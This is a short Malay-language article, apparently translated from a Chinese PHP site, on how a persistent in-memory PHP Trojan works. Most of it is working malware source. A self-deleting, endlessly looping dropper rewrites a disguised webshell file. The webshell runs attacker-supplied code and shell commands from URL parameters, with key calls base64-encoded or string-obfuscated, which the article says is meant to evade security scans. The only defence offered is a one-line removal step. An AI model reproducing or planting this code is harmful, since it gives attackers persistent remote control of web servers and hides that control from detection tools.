Membawa anda menganalisis prinsip pelaksanaan virus Trojan memori PHP

Kata Pengantar

Memory Trojan ialah virus Trojan yang berjalan dalam ingatan dan tidak mempunyai entiti kod. Trojan Memori sangat tersembunyi, sukar untuk dikesan, dan tidak boleh dibunuh (biasanya dikenali sebagai kuda abadi).

Industri keselamatan rangkaian mempunyai kesan tong yang kuat. Sistem ini melawan topi hitam, dan hasilnya bergantung pada pautan paling lemah dalam keselamatan. Topi hitam berbanding topi putih, hasilnya bergantung pada tahap serangan dan tahap penyembunyian dan kemusnahan.

Teks utama tidak membincangkan sama ada muat naik fail sewenang-wenangnya atau serangan sumber dekat menjadikan sekeping kod berniat jahat boleh diakses oleh pelayan pengeluaran.

Kod sumber virus (sangat mudah)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}

Lepaskan badan virus

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}

Arahan

• Kod sensitif utama di atas telah dikodkan untuk mengelakkan pelbagai imbasan keselamatan.

• Setelah sampel virus dijalankan, ia akan memadamkan dirinya sendiri dan berjalan dalam ingatan untuk masa yang lama.

• Walaupun Trojan yang dikeluarkan ditemui dan dipadamkan, fail yang sama masih akan dijana.

Penyelesaian

Selepas mematikan proses, padamkan fail Trojan yang dikeluarkan.

Disyorkan: "Tutorial Video PHP"

Atas ialah kandungan terperinci Membawa anda menganalisis prinsip pelaksanaan virus Trojan memori PHP. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!